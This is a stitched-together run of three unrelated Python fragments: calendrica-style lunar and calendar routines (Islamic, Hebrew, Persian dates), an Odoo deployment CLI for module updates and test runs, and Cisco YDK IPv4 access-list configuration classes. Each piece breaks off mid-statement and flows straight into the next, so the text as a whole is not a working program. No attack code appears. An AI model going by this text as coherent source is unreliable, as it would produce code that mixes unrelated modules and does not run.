topocentric_lunar_altitude(tee, location): """Return the topocentric altitude of moon at moment, tee, at location, location, as a small positive/negative angle in degrees, ignoring refraction.""" return lunar_altitude(tee, location) - lunar_parallax(tee, location) # see lines 3834-3839 in calendrica-3.0.cl def lunar_diameter(tee): """Return the geocentric apparent lunar diameter of the moon (in degrees) at moment, tee. Adapted from 'Astronomical Algorithms' by <NAME>, Willmann_Bell, Inc., 2nd ed.""" return deg(1792367000/9) / lunar_distance(tee) ########################################### # astronomical lunar calendars algorithms # ########################################### # see lines 5829-5845 in calendrica-3.0.cl def visible_crescent(date, location): """Return <NAME> criterion for likely visibility of crescent moon on eve of date 'date', at location 'location'.""" tee = universal_from_standard(dusk(date - 1, location, deg(mpf(4.5))), location) phase = lunar_phase(tee) altitude = lunar_altitude(tee, location) arc_of_light = arccos_degrees(cosine_degrees(lunar_latitude(tee)) * cosine_degrees(phase)) return ((NEW < phase < FIRST_QUARTER) and (deg(mpf(10.6)) <= arc_of_light <= deg(90)) and (altitude > deg(mpf(4.1)))) # see lines 5847-5860 in calendrica-3.0.cl def phasis_on_or_before(date, location): """Return the closest fixed date on or before date 'date', when crescent moon first became visible at location 'location'.""" mean = date - ifloor(lunar_phase(date + 1) / deg(360) * MEAN_SYNODIC_MONTH) tau = ((mean - 30) if (((date - mean) <= 3) and (not visible_crescent(date, location))) else (mean - 2)) return next(tau, lambda d: visible_crescent(d, location)) # see lines 5862-5866 in calendrica-3.0.cl # see lines 220-221 in calendrica-3.0.errata.cl # Sample location for Observational Islamic calendar # (Cairo, Egypt). ISLAMIC_LOCATION = location(deg(mpf(30.1)), deg(mpf(31.3)), mt(200), hr(2)) # see lines 5868-5882 in calendrica-3.0.cl def fixed_from_observational_islamic(i_date): """Return fixed date equivalent to Observational Islamic date, i_date.""" month = standard_month(i_date) day = standard_day(i_date) year = standard_year(i_date) midmonth = ISLAMIC_EPOCH + ifloor((((year - 1) * 12) + month - 0.5) * MEAN_SYNODIC_MONTH) return (phasis_on_or_before(midmonth, ISLAMIC_LOCATION) + day - 1) # see lines 5884-5896 in calendrica-3.0.cl def observational_islamic_from_fixed(date): """Return Observational Islamic date (year month day) corresponding to fixed date, date.""" crescent = phasis_on_or_before(date, ISLAMIC_LOCATION) elapsed_months = iround((crescent - ISLAMIC_EPOCH) / MEAN_SYNODIC_MONTH) year = quotient(elapsed_months, 12) + 1 month = mod(elapsed_months, 12) + 1 day = (date - crescent) + 1 return islamic_date(year, month, day) # see lines 5898-5901 in calendrica-3.0.cl JERUSALEM = location(deg(mpf(31.8)), deg(mpf(35.2)), mt(800), hr(2)) # see lines 5903-5918 in calendrica-3.0.cl def astronomical_easter(g_year): """Return date of (proposed) astronomical Easter in Gregorian year, g_year.""" jan1 = gregorian_new_year(g_year) equinox = solar_longitude_after(SPRING, jan1) paschal_moon = ifloor(apparent_from_local( local_from_universal( lunar_phase_at_or_after(FULL, equinox), JERUSALEM), JERUSALEM)) # Return the Sunday following the Paschal moon. return kday_after(SUNDAY, paschal_moon) # see lines 5920-5923 in calendrica-3.0.cl JAFFA = location(angle(32, 1, 60), angle(34, 45, 0), mt(0), hr(2)) # see lines 5925-5938 in calendrica-3.0.cl def phasis_on_or_after(date, location): """Return closest fixed date on or after date, date, on the eve of which crescent moon first became visible at location, location.""" mean = date - ifloor(lunar_phase(date + 1) / deg(mpf(360)) * MEAN_SYNODIC_MONTH) tau = (date if (((date - mean) <= 3) and (not visible_crescent(date - 1, location))) else (mean + 29)) return next(tau, lambda d: visible_crescent(d, location)) # see lines 5940-5955 in calendrica-3.0.cl def observational_hebrew_new_year(g_year): """Return fixed date of Observational (classical) Nisan 1 occurring in Gregorian year, g_year.""" jan1 = gregorian_new_year(g_year) equinox = solar_longitude_after(SPRING, jan1) sset = universal_from_standard(sunset(ifloor(equinox), JAFFA), JAFFA) return phasis_on_or_after(ifloor(equinox) - (14 if (equinox < sset) else 13), JAFFA) # see lines 5957-5973 in calendrica-3.0.cl def fixed_from_observational_hebrew(h_date): """Return fixed date equivalent to Observational Hebrew date.""" month = standard_month(h_date) day = standard_day(h_date) year = standard_year(h_date) year1 = (year - 1) if (month >= TISHRI) else year start = fixed_from_hebrew(hebrew_date(year1, NISAN, 1)) g_year = gregorian_year_from_fixed(start + 60) new_year = observational_hebrew_new_year(g_year) midmonth = new_year + iround(29.5 * (month - 1)) + 15 return phasis_on_or_before(midmonth, JAFFA) + day - 1 # see lines 5975-5991 in calendrica-3.0.cl def observational_hebrew_from_fixed(date): """Return Observational Hebrew date (year month day) corresponding to fixed date, date.""" crescent = phasis_on_or_before(date, JAFFA) g_year = gregorian_year_from_fixed(date) ny = observational_hebrew_new_year(g_year) new_year = observational_hebrew_new_year(g_year - 1) if (date < ny) else ny month = iround((crescent - new_year) / 29.5) + 1 year = (standard_year(hebrew_from_fixed(new_year)) + (1 if (month >= TISHRI) else 0)) day = date - crescent + 1 return hebrew_date(year, month, day) # see lines 5993-5997 in calendrica-3.0.cl def classical_passover_eve(g_year): """Return fixed date of Classical (observational) Passover Eve (Nisan 14) occurring in Gregorian year, g_year.""" return observational_hebrew_new_year(g_year) + 13 ############################### # persian calendar algorithms # ############################### # see lines 3844-3847 in calendrica-3.0.cl def persian_date(year, month, day): """Return a Persian date data structure.""" return [year, month, day] # see lines 3849-3852 in calendrica-3.0.cl PERSIAN_EPOCH = fixed_from_julian(julian_date(ce(622), MARCH, 19)) # see lines 3854-3858 in calendrica-3.0.cl TEHRAN = location(deg(mpf(35.68)), deg(mpf(51.42)), mt(1100), hr(3 + 1/2)) # see lines 3860-3865 in calendrica-3.0.cl def midday_in_tehran(date): """Return Universal time of midday on fixed date, date, in Tehran.""" return universal_from_standard(midday(date, TEHRAN), TEHRAN) # see lines 3867-3876 in calendrica-3.0.cl def persian_new_year_on_or_before(date): """Return the fixed date of Astronomical Persian New Year on or before fixed date, date.""" approx = estimate_prior_solar_longitude(SPRING, midday_in_tehran(date)) return next(ifloor(approx) - 1, lambda day: (solar_longitude(midday_in_tehran(day)) <= (SPRING + deg(2)))) # see lines 3880-3898 in calendrica-3.0.cl def fixed_from_persian(p_date): """Return fixed date of Astronomical Persian date, p_date.""" month = standard_month(p_date) day = standard_day(p_date) year = standard_year(p_date) temp = (year - 1) if (0 < year) else year new_year = persian_new_year_on_or_before(PERSIAN_EPOCH + 180 + ifloor(MEAN_TROPICAL_YEAR * temp)) return ((new_year - 1) + ((31 * (month - 1)) if (month <= 7) else (30 * (month - 1) + 6)) + day) # see lines 3898-3918 in calendrica-3.0.cl def persian_from_fixed(date): """Return Astronomical Persian date (year month day) corresponding to fixed date, date.""" new_year = persian_new_year_on_or_before(date) y = iround((new_year - PERSIAN_EPOCH) / MEAN_TROPICAL_YEAR) + 1 year = y if (0 < y) else (y - 1) day_of_year = date - fixed_from_persian(persian_date(year, 1, 1)) + 1 month = (ceiling(day_of_year / 31) if (day_of_year <= 186) else ceiling((day_of_year - 6) / 30)) day = date - (fixed_from_persian(persian_date(year, month, 1)) - 1) return persian_date(year, month, day) # see lines 3920-3932 in calendrica-3.0.cl def is_arithmetic_persian_leap_year(p_year): """Return True if p_year is a leap year on the Persian calendar.""" y = (p_year - 474) if (0 < p_year) else (p_year - 473) year = mod(y, 2820) + 474 return mod((year + 38) * 31, 128) < 31 # see lines 3934-3958 in calendrica-3.0.cl def fixed_from_arithmetic_persian(p_date): """Return fixed date equivalent to Persian date p_date.""" day = standard_day(p_date) month = standard_month(p_date) p_year = standard_year(p_date) y = (p_year - 474) if (0 < p_year) else (p_year - 473) year = mod(y, 2820) + 474 temp = (31 * (month - 1)) if (month <= 7) else ((30 * (month - 1)) + 6) return ((PERSIAN_EPOCH - 1) + (1029983 * quotient(y, 2820)) + (365 * (year - 1)) + quotient((31 * year) - 5, 128) + temp + day) # see lines 3960-3986 in calendrica-3.0.cl def arithmetic_persian_year_from_fixed(date): """Return Persian year corresponding to the fixed date, date.""" d0 = date - fixed_from_arithmetic_persian(persian_date(475, 1, 1)) n2820 = quotient(d0, 1029983) d1 =
params += ['--no-install-server-wide-first'] if no_update_module_list: params += ['--no-update-modulelist'] if no_dangling_check: params += ['--no-dangling-check'] if i18n: params += ['--i18n'] if not tests: params += ['--no-tests'] if server_wide_modules: params += ['--server-wide-modules', server_wide_modules] if additional_addons_paths: params += ['--additional-addons-paths', additional_addons_paths] params += ["--config-file=" + config_file] rc = _exec_update(config, params) if rc: raise UpdateException(module) except UpdateException: raise except Exception as ex: click.echo(traceback.format_exc()) ctx.invoke(show_install_state, suppress_error=no_dangling_check) raise Exception(( "Error at /update_modules.py - " "aborting update process.")) from ex if check_install_state: ctx.invoke(show_install_state, suppress_error=no_dangling_check) if outdated_modules: _technically_update(outdated_modules) _technically_update(module) if not no_restart and config.use_docker: Commands.invoke(ctx, 'restart', machines=['odoo']) if config.run_odoocronjobs: Commands.invoke(ctx, 'restart', machines=['odoo_cronjobs']) if config.run_queuejobs: Commands.invoke(ctx, 'restart', machines=['odoo_queuejobs']) Commands.invoke(ctx, 'up', daemon=True) Commands.invoke(ctx, 'status') if config.odoo_update_start_notification_touch_file_in_container: Path( config.odoo_update_start_notification_touch_file_in_container).write_text("0") def _uninstall_marked_modules(): """ Checks for file "uninstall" in customs root and sets modules to uninstalled. """ from .odoo_config import MANIFEST if float(config.odoo_version) < 11.0: return # check if something is todo to_uninstall = MANIFEST().get('uninstall', []) to_uninstall = [x for x in to_uninstall if DBModules.is_module_installed(x)] if to_uninstall: click.secho("Going to uninstall {}".format(', '.join(to_uninstall)), fg='red') if config.use_docker: from .lib_control_with_docker import shell as lib_shell for module in to_uninstall: click.secho(f"Uninstall {module}", fg='red') lib_shell(""" self.env['ir.module.module'].search([ ('name', '=', '{}'), ('state', 'in', ['to upgrade', 'to install', 'installed']) ]).module_uninstall() self.env.cr.commit() """.format(module)) to_uninstall = [x for x in to_uninstall if DBModules.is_module_installed(x)] if to_uninstall: click.secho(f"Failed to uninstall: {','.join(to_uninstall)}", fg='red') sys.exit(-1) if not uninstall: _perform_install(module) _uninstall_marked_modules() if param_module not in ['all', 'base']: missing_modules = list( DBModules.check_if_all_modules_from_install_are_installed()) if missing_modules and not no_dangling_check: click.secho(( f"Not installed: {','.join(missing_modules)}" ), fg='red') sys.exit(-88) @odoo_module.command(name="update-i18n", help="Just update translations") @click.argument('module', nargs=-1, required=False) @click.option('--no-restart', default=False, is_flag=True, help="If set, no machines are restarted afterwards") @pass_config @click.pass_context def update_i18n(ctx, config, module, no_restart): if config.run_postgres: Commands.invoke(ctx, 'up', machines=['postgres'], daemon=True) Commands.invoke(ctx, 'wait_for_container_postgres') module = list(filter(lambda x: x, sum(map(lambda x: x.split(','), module), []))) # '1,2 3' --> ['1', '2', '3'] if not module: module = _get_default_modules_to_update() try: params = [','.join(module)] params += ['--non-interactive'] params += ['--no-update-modulelist'] params += ['--no-dangling-check'] params += ['--only-i18n'] _exec_update(config, params) except Exception: click.echo(traceback.format_exc()) ctx.invoke(show_install_state, suppress_error=True) raise Exception("Error at /update_modules.py - aborting update process.") if not no_restart: Commands.invoke(ctx, 'restart', machines=['odoo']) @odoo_module.command() @pass_config def progress(config): """ Displays installation progress """ for row in _execute_sql(config.get_odoo_conn(), "select state, count(*) from ir_module_module group by state;", fetchall=True): click.echo("{}: {}".format(row[0], row[1])) @odoo_module.command(name='show-install-state') @pass_config def show_install_state(config, suppress_error=False): from .module_tools import DBModules dangling = list(DBModules.get_dangling_modules()) if dangling: click.echo("Displaying dangling modules:") for row in dangling: click.echo("{}: {}".format(row[0], row[1])) # get modules, that are not installed: missing = list(DBModules.check_if_all_modules_from_install_are_installed()) for missing_item in missing: click.secho(( f"Module {missing_item} not installed!" ), fg='red') if (dangling or missing) and not suppress_error: raise Exception(( "Dangling modules detected - " " please fix installation problems and retry! \n" f"Dangling: {dangling}\n" f"Missing: {missing}\n" )) @odoo_module.command(name='show-addons-paths') def show_addons_paths(): from .odoo_config import get_odoo_addons_paths paths = get_odoo_addons_paths() for path in paths: click.echo(path) @odoo_module.command(name='pretty-print-manifest') def pretty_print_manifest(): from .odoo_config import MANIFEST MANIFEST().rewrite() @odoo_module.command(name='show-conflicting-modules') def show_conflicting_modules(): from .odoo_config import get_odoo_addons_paths get_odoo_addons_paths() def _exec_update(config, params): if config.use_docker: params = ['run', 'odoo_update', '/update_modules.py'] + params return __cmd_interactive(*params) else: from . import lib_control_native return lib_control_native._update_command(config, params) @odoo_module.command() @click.argument('file', required=False) @click.option('-u', '--user', default='admin') @click.option('-a', '--all', is_flag=True) @click.option('-t', '--tag', is_flag=False) @click.option('-n', '--test_name', is_flag=False) @click.option('-p', '--param', multiple=True, help="e.g. --param key1=value1 --param key2=value2") @click.option('--install-required-modules', is_flag=True, help="No tests run - just the dependencies are installed like e.g. web_selenium") @pass_config @click.pass_context def robotest(ctx, config, file, user, all, tag, test_name, param, install_required_modules): PARAM = param del param from pathlib import Path from .odoo_config import customs_dir from .robo_helpers import _make_archive from .module_tools import DBModules if not config.devmode and not config.force: click.secho("Devmode required to run unit tests. Database will be destroyed.", fg='red') sys.exit(-1) testfiles = _get_all_robottest_files() if file and all: click.secho("Cannot provide all and file together!", fg='red') sys.exit(-1) if file: if '/' in file: filename = Path(file) else: match = [x for x in testfiles if file in x.name] if len(match) > 1: click.secho("Not unique: {file}", fg='red') sys.exit(-1) if match: filename = match[0] if filename not in testfiles: click.secho(f"Not found: {filename}", fg='red') sys.exit(-1) filename = [filename] else: testfiles = sorted(testfiles) if not all: message = "Please choose the unittest to run." try: filename = [inquirer.prompt([inquirer.List('filename', message, choices=testfiles)]).get('filename')] except Exception: sys.exit(-1) else: filename = list(sorted(testfiles)) if not filename: return click.secho('\n'.join(map(str, filename)), fg='green', bold=True) odoo_modules, archive = _make_archive(config.verbose, filename, customs_dir()) odoo_modules = list(set(odoo_modules) | set(['web_selenium', 'robot_utils'])) if odoo_modules: def not_installed(module): return DBModules.get_meta_data(module)['state'] == 'uninstalled' modules_to_install = list(filter(not_installed, odoo_modules)) if modules_to_install: click.secho(( "Installing required modules for robot tests: " f"{','.join(modules_to_install)}" ), fg='yellow') Commands.invoke( ctx, 'update', module=modules_to_install, no_dangling_check=True) if install_required_modules: click.secho("Dependencies are installed - exiting", fg='yellow') return pwd = config.DEFAULT_DEV_PASSWORD if pwd == "True" or pwd is True: pwd = '1' def params(): params = { "url": "http://proxy", "user": user, "dbname": config.DBNAME, "password": config.DEFAULT_DEV_PASSWORD, "selenium_timeout": 20, # selenium timeout, } if test_name: params['test_name'] = test_name if tag: params['include'] = [tag] for param in PARAM: k, v = param.split("=") params[k] = v del param return params data = json.dumps({ 'test_file': archive, 'params': params(), }) data = base64.b64encode(data.encode('utf-8')) params = [ 'robot', ] __dcrun(params, pass_stdin=data.decode('utf-8'), interactive=True) output_path = config.HOST_RUN_DIR / 'odoo_outdir' / 'robot_output' test_results = json.loads((output_path / 'results.json').read_text()) failds = [x for x in test_results if x['result'] != 'ok'] color_info = 'green' for failed in failds: color_info = 'red' click.secho(f"Test failed: {failed['name']} - Duration: {failed['duration']}", fg='red') click.secho(f"Duration: {sum(map(lambda x: x['duration'], test_results))}s", fg=color_info) click.secho(f"Outputs are generated in {output_path}", fg='yellow') click.secho(f"Watch the logs online at: http://host:{config.PROXY_PORT}/robot-output") if failds: sys.exit(-1) def _get_unittests_from_module(module_name): from .module_tools import Module from .odoo_config import MANIFEST_FILE testfiles = [] module = Module.get_by_name(module_name) parent_dir = MANIFEST_FILE().parent for _file in module.path.glob("tests/test*.py"): testfiles.append(_file.relative_to(parent_dir)) return testfiles def _get_unittests_from_modules(module_names): testfiles = [] for module in module_names: testfiles += _get_unittests_from_module(module) return testfiles def _get_all_unittest_files(config, all_files=False): from .odoo_config import MANIFEST modules = all_files and __get_installed_modules(config) or MANIFEST().get('install', []) return _get_unittests_from_modules(modules) def _get_all_robottest_files(): from .odoo_config import MANIFEST, MANIFEST_FILE from .module_tools import Module from .odoo_config import customs_dir testfiles = [] for _file in customs_dir().glob("**/*.robot"): if 'keywords' in _file.parts: continue if 'library' in _file.parts: continue testfiles.append(_file.relative_to(MANIFEST_FILE().parent)) del _file return testfiles @odoo_module.command() @click.option('-a', '--all', is_flag=True) @pass_config def list_unit_test_files(config, all): files = _get_all_unittest_files(config, all_files=all) click.secho("!!!") for file in files: click.secho(file) click.secho("!!!") @odoo_module.command() @pass_config def list_robot_test_files(config): files = _get_all_robottest_files() click.secho("!!!") for file in files: click.secho(file) click.secho("!!!") @odoo_module.command() @click.option('-r', '--repeat', is_flag=True) @click.argument('file', required=False) @click.option('-w', '--wait-for-remote', is_flag=True) @click.option('-r', '--remote-debug', is_flag=True) @click.option('-a', '--all', is_flag=True) @click.option('-n', '--non-interactive', is_flag=True) @pass_config def unittest(config, repeat, file, remote_debug, wait_for_remote, all, non_interactive): """ Collects unittest files and offers to run """ from .odoo_config import MANIFEST, MANIFEST_FILE from .module_tools import Module from pathlib import Path last_unittest = config.runtime_settings.get('last_unittest') testfiles = _get_all_unittest_files(config, all_files=all) if file: if '/' in file: filename = Path(file) else: match = [x for x in testfiles if x.name == file or x.name == file + '.py'] if match: filename = match[0] if filename not in testfiles: click.secho(f"Not found: {filename}", fg='red') sys.exit(-1) else: if repeat and last_unittest: filename = last_unittest else: testfiles = sorted(testfiles) message = "Please choose the unittest to run." filename = inquirer.prompt([inquirer.List('filename', message, choices=testfiles)]).get('filename') if not filename: return config.runtime_settings.set('last_unittest', filename) click.secho(str(filename), fg='green', bold=True) container_file = Path('/opt/src/') / filename interactive = True # means pudb trace turned on params = [ 'odoo', '/odoolib/unit_test.py', f'{container_file}', ] if wait_for_remote: remote_debug = True interactive = False if non_interactive: interactive = False del non_interactive if remote_debug: params += ["--remote-debug"] if wait_for_remote: params += ["--wait-for-remote"] if not interactive: params += ['--not-interactive'] __dcrun(params + ['--log-level=debug'], interactive=interactive) @odoo_module.command() @click.argument("name", required=True) @pass_config @click.pass_context def set_ribbon(ctx, config, name): SQL = """ Select state from ir_module_module where name = 'web_environment_ribbon'; """ res = _execute_sql(config.get_odoo_conn(), SQL, fetchone=True) if not (res and res[0] == 'installed'): try: Commands.invoke( ctx, 'update', module=['web_environment_ribbon'], no_dangling_check=True) except Exception as ex: print(ex) _execute_sql(config.get_odoo_conn(), """ UPDATE ir_config_parameter SET value = %s WHERE key = 'ribbon.name'; """, params=(name,)) @odoo_module.command(help="For directly installed odoos.") @pass_config @click.pass_context def generate_update_command(ctx, config): modules = _get_default_modules_to_update() click.secho(f"-u {','.join(modules)}") def _get_changed_files(git_sha): from .module_tools import Module from .tools import git_diff_files cwd = os.getcwd() filepaths = git_diff_files(cwd, git_sha, "HEAD") repo = Repo(cwd) # check if there are submodules: filepaths2 = [] cwd = Path(os.getcwd()) for filepath in filepaths: os.chdir(cwd) submodule = [x for x in repo.submodules if x.path == filepath] if submodule: current_commit = str(repo.active_branch.commit) old_commit = subprocess.check_output([ 'git', 'rev-parse', f"{git_sha}:./{filepath}" ]).decode("utf-8").strip() new_commit = subprocess.check_output([ 'git', 'rev-parse', f"{current_commit}:./{filepath}" ]).decode("utf-8").strip() # now diff the submodule submodule_path = cwd / filepath submodule_relative_path = filepath for filepath2 in git_diff_files( submodule_path, old_commit, new_commit ): filepaths2.append(submodule_relative_path + "/" + filepath2) else: filepaths2.append(filepath) return filepaths2 def _get_changed_modules(git_sha): from .module_tools import Module filepaths = _get_changed_files(git_sha) modules =
<ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclPortNumberEnum>` ---- **type**\: int **range:** 0..65535 ---- .. attribute:: source_operator Source comparison operator . Leave unspecified if no source port comparison is to be done **type**\: :py:class:`Ipv4AclOperatorEnumEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclOperatorEnumEnum>` """ _prefix = 'ipv4-acl-cfg' _revision = '2015-11-09' def __init__(self): self.parent = None self.first_source_port = None self.second_source_port = None self.source_operator = None @property def _common_path(self): if self.parent is None: raise YPYModelError('parent is not set . Cannot derive path.') return self.parent._common_path +'/Cisco-IOS-XR-ipv4-acl-cfg:source-port' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return True def _has_data(self): if not self.is_config(): return False if self.first_source_port is not None: return True if self.second_source_port is not None: return True if self.source_operator is not None: return True return False @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_acl_cfg as meta return meta._meta_table['Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.SourcePort']['meta_info'] class DestinationPort(object): """ Destination port settings. .. attribute:: destination_operator Destination comparison operator. Leave unspecified if no destination port comparison is to be done **type**\: :py:class:`Ipv4AclOperatorEnumEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclOperatorEnumEnum>` .. attribute:: first_destination_port First destination port for comparison, leave unspecified if destination port comparison is not to be performed **type**\: one of the below types: **type**\: :py:class:`Ipv4AclPortNumberEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclPortNumberEnum>` ---- **type**\: int **range:** 0..65535 ---- .. attribute:: second_destination_port Second destination port for comparion, leave unspecified if destination port comparison is not to be performed **type**\: one of the below types: **type**\: :py:class:`Ipv4AclPortNumberEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclPortNumberEnum>` ---- **type**\: int **range:** 0..65535 ---- """ _prefix = 'ipv4-acl-cfg' _revision = '2015-11-09' def __init__(self): self.parent = None self.destination_operator = None self.first_destination_port = None self.second_destination_port = None @property def _common_path(self): if self.parent is None: raise YPYModelError('parent is not set . Cannot derive path.') return self.parent._common_path +'/Cisco-IOS-XR-ipv4-acl-cfg:destination-port' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return True def _has_data(self): if not self.is_config(): return False if self.destination_operator is not None: return True if self.first_destination_port is not None: return True if self.second_destination_port is not None: return True return False @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_acl_cfg as meta return meta._meta_table['Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.DestinationPort']['meta_info'] class Icmp(object): """ ICMP settings. .. attribute:: icmp_type_code Well known ICMP message code types to match, leave unspecified if ICMP message code type comparion is not to be performed **type**\: :py:class:`Ipv4AclIcmpTypeCodeEnumEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclIcmpTypeCodeEnumEnum>` """ _prefix = 'ipv4-acl-cfg' _revision = '2015-11-09' def __init__(self): self.parent = None self.icmp_type_code = None @property def _common_path(self): if self.parent is None: raise YPYModelError('parent is not set . Cannot derive path.') return self.parent._common_path +'/Cisco-IOS-XR-ipv4-acl-cfg:icmp' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return True def _has_data(self): if not self.is_config(): return False if self.icmp_type_code is not None: return True return False @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_acl_cfg as meta return meta._meta_table['Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.Icmp']['meta_info'] class Tcp(object): """ TCP settings. .. attribute:: tcp_bits TCP bits to match. Leave unspecified if comparison of TCP bits is not required **type**\: one of the below types: **type**\: :py:class:`Ipv4AclTcpBitsNumberEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclTcpBitsNumberEnum>` ---- **type**\: int **range:** 0..32 ---- .. attribute:: tcp_bits_mask TCP bits mask to use for flexible TCP matching. Leave unspecified if tcp\-bits\-match\-operator is unspecified **type**\: one of the below types: **type**\: :py:class:`Ipv4AclTcpBitsNumberEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclTcpBitsNumberEnum>` ---- **type**\: int **range:** 0..32 ---- .. attribute:: tcp_bits_match_operator TCP Bits match operator. Leave unspecified if flexible comparison of TCP bits is not required **type**\: :py:class:`Ipv4AclTcpMatchOperatorEnumEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclTcpMatchOperatorEnumEnum>` """ _prefix = 'ipv4-acl-cfg' _revision = '2015-11-09' def __init__(self): self.parent = None self.tcp_bits = None self.tcp_bits_mask = None self.tcp_bits_match_operator = None @property def _common_path(self): if self.parent is None: raise YPYModelError('parent is not set . Cannot derive path.') return self.parent._common_path +'/Cisco-IOS-XR-ipv4-acl-cfg:tcp' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return True def _has_data(self): if not self.is_config(): return False if self.tcp_bits is not None: return True if self.tcp_bits_mask is not None: return True if self.tcp_bits_match_operator is not None: return True return False @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_acl_cfg as meta return meta._meta_table['Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.Tcp']['meta_info'] class PacketLength(object): """ Packet length settings. .. attribute:: packet_length_max Maximum packet length for comparion, leave unspecified if packet length comparison is not to be performed or if only the minimum packet length should be considered **type**\: int **range:** 0..65535 .. attribute:: packet_length_min Minimum packet length for comparison, leave unspecified if packet length comparison is not to be performed or if only the maximum packet length should be considered **type**\: int **range:** 0..65535 .. attribute:: packet_length_operator Packet length operator applicable if Packet length is to be compared. Leave unspecified if no packet length comparison is to be done **type**\: :py:class:`Ipv4AclOperatorEnumEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclOperatorEnumEnum>` """ _prefix = 'ipv4-acl-cfg' _revision = '2015-11-09' def __init__(self): self.parent = None self.packet_length_max = None self.packet_length_min = None self.packet_length_operator = None @property def _common_path(self): if self.parent is None: raise YPYModelError('parent is not set . Cannot derive path.') return self.parent._common_path +'/Cisco-IOS-XR-ipv4-acl-cfg:packet-length' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return True def _has_data(self): if not self.is_config(): return False if self.packet_length_max is not None: return True if self.packet_length_min is not None: return True if self.packet_length_operator is not None: return True return False @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_acl_cfg as meta return meta._meta_table['Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.PacketLength']['meta_info'] class TimeToLive(object): """ TTL settings. .. attribute:: time_to_live_max Maximum TTL for comparion, leave unspecified if TTL comparison is not to be performed or if only the minimum TTL should be considered **type**\: int **range:** 0..255 .. attribute:: time_to_live_min TTL value for comparison OR Minimum TTL value for TTL range comparision, leave unspecified if TTL classification is not required **type**\: int **range:** 0..255 .. attribute:: time_to_live_operator TTL operator is applicable if TTL is to be compared. Leave unspecified if TTL classification is not required **type**\: :py:class:`Ipv4AclOperatorEnumEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_datatypes.Ipv4AclOperatorEnumEnum>` """ _prefix = 'ipv4-acl-cfg' _revision = '2015-11-09' def __init__(self): self.parent = None self.time_to_live_max = None self.time_to_live_min = None self.time_to_live_operator = None @property def _common_path(self): if self.parent is None: raise YPYModelError('parent is not set . Cannot derive path.') return self.parent._common_path +'/Cisco-IOS-XR-ipv4-acl-cfg:time-to-live' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return True def _has_data(self): if not self.is_config(): return False if self.time_to_live_max is not None: return True if self.time_to_live_min is not None: return True if self.time_to_live_operator is not None: return True return False @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_acl_cfg as meta return meta._meta_table['Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.TimeToLive']['meta_info'] class NextHop(object): """ Next\-hop settings. .. attribute:: next_hop_1 The first next\-hop settings **type**\: :py:class:`NextHop1 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_cfg.Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.NextHop.NextHop1>` .. attribute:: next_hop_2 The second next\-hop settings **type**\: :py:class:`NextHop2 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_cfg.Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.NextHop.NextHop2>` .. attribute:: next_hop_3 The third next\-hop settings **type**\: :py:class:`NextHop3 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_cfg.Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.NextHop.NextHop3>` .. attribute:: next_hop_type The nexthop type **type**\: :py:class:`NextHopTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_cfg.NextHopTypeEnum>` """ _prefix = 'ipv4-acl-cfg' _revision = '2015-11-09' def __init__(self): self.parent = None self.next_hop_1 = Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.NextHop.NextHop1() self.next_hop_1.parent = self self.next_hop_2 = Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.NextHop.NextHop2() self.next_hop_2.parent = self self.next_hop_3 = Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.NextHop.NextHop3() self.next_hop_3.parent = self self.next_hop_type = None class NextHop1(object): """ The first next\-hop settings. .. attribute:: next_hop The IPv4 address of the next\-hop **type**\: str **pattern:** 